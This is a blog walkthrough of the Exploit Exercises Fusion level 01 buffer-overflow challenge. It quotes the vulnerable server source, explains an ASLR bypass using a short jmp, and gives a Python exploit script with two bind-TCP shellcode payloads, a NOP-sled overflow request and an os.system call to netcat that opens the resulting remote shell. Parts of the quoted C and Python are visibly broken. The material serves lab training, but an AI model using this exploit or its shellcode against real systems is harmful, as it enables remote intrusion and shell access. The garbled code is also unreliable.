Skip to main content

Exploit Exercise Binary Exploitation Fusion Level 01

Hello Friends,

Welcome Again . Today, I am going to share my another walk through experience of Exploit exercise fusion level 01. Basically, This Level is complete copy of previous level but here, the only difference is ASLR (Address Space Layout Randomization). Don't forget to Check Exploit Exercise Fusion level 00

So, Let's start.


This is a simple introduction to get you warmed up. 
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a
 bad idea due to character restrictions due to realpath(). Instead, there is 
plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"    

int fix_path(char *path)
  char resolved[128]
  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);

char *parse_http_request()
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");


  printf("trying to access %s\n", path);

  return path;

int main(int argc, char **argv, char **envp)
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);


Here, Our problem is ALSR. well, after spending my valuable time in research and GDB testing. I found a way to bypass this problem.

Actually, Here Our Exact Problem is Random Space Of Injected Shell code Starting Point. So, We just need to point EIP to Starting of Our Shell code.

Well, Our Solution is JMP instruction. Those guys who don't know about it. Start google now. JMP instruction are like a small bytes of Instruction which Instruct EIP to Jump from One Address To Another.

Like we want to jump our EIP 39 Bytes Then Our Instruction will be

0:  eb 25                   jmp    0x27

Inject like this (String Literal)


Basically, This Command Will Instruct EIP to Jump 39 Bytes Forward From Current Position. Simple.

Further Details left over User to Understand it Yourself.

Here, is my exploit


# import modules
import socket
import struct
import os

# Target Configurations
TARGET_IP = raw_input('[+] Enter Target IP [default] : ') or ''

# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# file descriptor
sf = s.makefile("rw")

# connect

# ===================================================================
#             Unsuccessful Payload Created From MSFVENOM
# ===================================================================
# cmd
#    msfvenom -p linux/x86/shell/bind_tcp -n 200 -f py -b '\x00\xff'
buf =  ""
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB\x31\xF6\x31\xFF'
buf += "\x93\x41\x2f\x43\x48\xfc\x41\x49\x9b\x9b\x93\xf9\x9b"
buf += "\x2f\xfc\x9b\xf9\x90\x3f\x92\x93\x4b\x40\x49\x49\x92"
buf += "\xf9\x37\x92\x42\x43\x41\x91\x4b\xfd\xfc\x41\x91\x4a"
buf += "\x90\x27\xf5\x27\x90\x49\x2f\xf9\x43\x48\x42\x90\x4b"
buf += "\x2f\x37\xfc\x99\xfc\xf8\x9b\x9f\x92\x37\x4b\x93\x48"
buf += "\x43\x9f\x98\xf8\xf5\x93\x40\xf5\x41\x27\x40\x93\x3f"
buf += "\x4a\x9b\x93\x37\x41\x9f\xf8\x49\xf9\x41\xf5\x49\x91"
buf += "\x41\x42\x2f\x99\x90\x99\xf5\x37\xf9\x93\x9b\x2f\xf8"
buf += "\xf8\x41\x93\xf5\x42\x93\x49\xfc\xf5\x40\x37\x4b\x90"
buf += "\x43\xd6\x9f\xd6\x48\xf8\x42\x90\x49\x49\x2f\x2f\x37"
buf += "\x43\x92\xf8\x40\x9b\xfc\x91\x9f\x40\x40\x9f\xf8\xf8"
buf += "\x9b\xfd\xf9\x92\x91\x98\x42\x43\xfc\x49\x90\x9b\x98"
buf += "\x42\x98\x9b\x3f\x27\x40\xf8\xfd\x99\xf5\xfc\x4a\x27"
buf += "\xf8\x27\xfd\x43\x37\x49\x92\x9b\x49\x9f\x43\xd6\x92"
buf += "\x27\xfd\x4b\xfd\xf8\x49\x9f\xfc\xf8\x4a\x48\x49\x4b"
buf += "\x4b\x49\x99\x40\x92\xbe\x99\x74\x93\xf3\xda\xcb\xd9"
buf += "\x74\x24\xf4\x5d\x31\xc9\xb1\x1c\x31\x75\x14\x83\xed"
buf += "\xfc\x03\x75\x10\x7b\x81\xf9\x8e\x23\xf3\x4c\x77\x6a"
buf += "\x03\xa1\x78\x8c\x8d\x22\x1e\x0d\x6e\xa4\x2f\xc0\xf1"
buf += "\x94\x14\x2d\x12\x85\xe9\x82\xbf\x28\x67\xc5\xf0\x4b"
buf += "\xba\x85\xa0\xf9\x40\xd1\x28\xfc\x22\xd8\xfc\x97\x3a"
buf += "\x3b\x96\x99\x67\xd1\x01\xfe\x5a\xa5\x59\x7d\xa0\xb1"
buf += "\x3c\xd9\x77\xeb\xd6\xdf\x87\x1a\x7b\x8a\x97\x4d\xd3"
buf += "\xc3\x79\x07\xb5\x8b\xb4\x57\xe8\xcf\xf7\x31\xc6\x90"
buf += "\xa8\xfe\x68\xf6\xc1\x51\x8d\x3a\x51\xc2\x3b\xc8\xe2"
buf += "\xe7\x8e\x51\x85\x38\x4b\xe2\x8c\x0b\xec\xfd\x70"

# ================================================================
#                         Another Payload, 
# ===============================================================
# url :

buf  = ''
buf +="\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"

payload = ''
payload += 'GET '
payload += '\x90'*137 + '\xeb\x25'

payload+= struct.pack("I", 0x80488b9)
payload += '/'      # <--- To Stop Realpath function from overwriting return address
payload += '\x90'*200

# ShellCode here
payload += buf
payload += '\x90'*400

payload+= ' HTTP/1.1'



print "[+] Wait For Response"
 print ['trying to access %s\n')+10)]
 print "[-] If You Are Reading This Message Then Probably Exploit failed."
 input("[-] Exit. Trying Again..")
 print "[+] Starting Bind TCP Shell."
 print "[+] Use Commands Carefully."
 os.system('nc {} 1337'.format(TARGET_IP))

Check Exploit Exercise Fusion level 00

Don't forget to comment below some appreciable sentences.

Related Post

Top Visited

Big List Of Google Dorks For Sqli Injection

how to install burp suite in Linux/Ubuntu 16.04

Create Simple Packet Sniffer Using Python

Python Beautiful Soup Module - Tutorial - Part 2

Create Ping Sweeping Script Using Python

how to configure burpsuite with firefox?

Latest Google Dorks List

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

What is Burp Suite And its Features?

What is the use of Pseudo header in TCP/UDP packets?